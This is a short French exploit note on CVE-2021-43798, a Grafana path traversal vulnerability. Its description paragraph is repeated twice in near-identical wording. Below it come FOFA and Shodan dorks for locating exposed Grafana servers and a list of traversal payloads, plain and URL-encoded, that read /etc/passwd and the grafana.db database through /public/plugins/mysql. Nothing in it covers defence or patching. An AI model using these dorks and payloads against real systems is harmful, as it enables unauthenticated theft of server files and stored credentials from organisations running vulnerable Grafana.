
CVE-2021-43798 est une vulnérabilité de traversée de répertoire de gravité élevée (score CVSS 3.1 : 7,5) affectant les versions de Grafana 8.0.0-beta1 à 8.3.0. Elle permet à des attaquants non authentifiés de lire des fichiers arbitraires du serveur en exploitant un assainissement inapproprié dans le point de terminaison /public/plugins/:pluginId
CVE-2021-43798 est une vulnérabilité de traversée de chemin de sévérité élevée (score CVSS 3.1 : 7,5) affectant Grafana versions 8.0.0-beta1 à 8.3.0. Elle permet à des attaquants non authentifiés de lire des fichiers arbitraires sur le serveur en exploitant une mauvaise désinfection dans le point de terminaison /public/plugins/:pluginId
dork :
fofa : title="Grafana" && port="3000" shodan : http.title:"Grafana" port:3000
charge utile :
/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd /public/plugins/mysql/../../../../../../../../../../../../etc/passwd /public/plugins/mysql/../../../../../../../../../../../../var/lib/grafana/grafana.db /public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fgrafana%2Fgrafana.db